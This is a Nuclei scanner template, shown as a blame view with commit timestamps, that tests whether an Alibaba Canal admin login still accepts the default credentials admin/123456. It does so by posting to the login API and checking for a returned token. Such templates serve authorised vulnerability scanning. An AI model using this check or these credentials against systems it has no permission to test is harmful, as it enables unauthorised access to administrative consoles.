nuclei-templates/http/default-logins/alibaba/canal-default-login.yaml

45 lines
909 B
YAML
Raw Normal View History

2021-09-21 11:46:53 +00:00
id: canal-default-login
info:
2021-09-22 10:37:07 +00:00
name: Alibaba Canal Default Login
author: pdteam
severity: high
description: An Alibaba Canal default login was discovered.
reference:
- https://github.com/alibaba/canal/wiki/ClientAdapter
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: alibaba,default-login
http:
- raw:
- |
POST /api/v1/user/login HTTP/1.1
2021-10-10 01:21:50 +00:00
Host: {{Hostname}}
Content-Type: application/json
2021-10-10 01:53:02 +00:00
{"username":"{{user}}","password":"{{pass}}"}
2021-10-10 01:53:02 +00:00
attack: pitchfork
payloads:
2021-10-10 01:53:02 +00:00
user:
- admin
2021-10-10 01:53:02 +00:00
pass:
- 123456
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-10-10 01:53:02 +00:00
- type: word
2021-10-10 01:53:02 +00:00
condition: and
words:
- 'data":{"token"'
- '"code":20000'
# Enhanced by mp on 2022/03/22